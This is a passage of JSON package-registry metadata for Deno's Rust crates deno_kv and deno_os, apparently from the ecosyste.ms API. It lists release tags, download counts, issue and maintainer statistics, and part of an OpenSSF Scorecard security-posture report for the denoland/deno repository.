s/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T02:05:41.523Z","dependent_packages_count":1,"downloads":364721,"downloads_period":"total","dependent_repos_count":2,"rankings":{"downloads":8.602028972399344,"dependent_repos_count":13.286671091534425,"dependent_packages_count":18.154321918841454,"stargazers_count":0.0022611133722244834,"forks_count":0.05803524322042841,"docker_downloads_count":6.750482392667631,"average":7.808966788672585},"purl":"pkg:cargo/deno_kv","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_kv","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_kv","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_kv/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_kv/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_kv/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_kv/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_kv/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_kv/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_kv/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2023-03-24T12:38:28.225Z","updated_at":"2023-03-24T12:38:28.225Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:43.334Z","updated_at":"2023-07-18T22:41:43.334Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11259045,"name":"deno_os","ecosystem":"cargo","description":"OS specific APIs for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":74,"first_release_published_at":"2025-01-13T18:06:42.585Z","latest_release_published_at":"2026-08-06T11:46:41.990Z","latest_release_number":"0.74.0","last_synced_at":"2026-08-29T21:57:20.702Z","created_at":"2025-01-13T18:32:29.500Z","updated_at":"2026-08-29T21:57:20.702Z","registry_url":"https://crates.io/crates/deno_os/","install_command":"cargo install deno_os","documentation_url":"https://docs.rs/deno_os/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: 